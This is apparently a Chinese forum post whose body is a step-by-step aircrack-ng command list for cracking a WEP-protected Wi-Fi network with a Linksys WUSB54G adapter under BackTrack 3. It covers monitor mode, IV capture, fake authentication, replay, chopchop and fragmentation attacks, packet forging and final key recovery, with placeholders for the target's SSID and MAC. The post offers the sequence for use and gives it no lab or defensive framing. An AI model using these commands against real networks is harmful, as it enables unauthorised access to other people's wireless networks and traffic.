上等兵
- 注册时间
- 2009-6-16
- 金币
- 27 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
我用linksys wusb54g
bt3 下的网卡名为 rausb0
ifconfig -a
ifconfig -a rausb0 up
airmon-ng start rausb0 <Channel>
airodump-ng --ivs -w <IVS_File> -c <Channel> rausb0
airodump-ng rausb0
aireplay-ng -1 0 -e <SSID> -a <ApMac> -h <MyMac> rausb0
----------- -2 Crack Mode-----------
aireplay-ng -2 -p 0841 -c ffffffffffff -b <ApMac> -h <MyMac> rausb0
----------- -3 Crack Mode-----------
aireplay-ng -3 -b <ApMac> -h <MyMac> rausb0
----------- -4 Crack Mode-----------
aireplay-ng -4 -b <ApMac> -h <MyMac> rausb0
packetforge-ng -0 -a <ApMac> -h <MyMac> -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 rausb0
----------- -5 Crack Mode-----------
aireplay-ng -5 -b <ApMac> -h <MyMac> rausb0
packetforge-ng -0 -a <ApMac> -h <MyMac> -k 255.255.255.255 -l 255.255.255.255 -y .xor -w MyArp
aireplay-ng -2 -r MyArp -x 256 rausb0
-----------Crack Key-----------
aircrack-ng -n 64 -b <ApMac> <IVS_File>-01.ivs |
|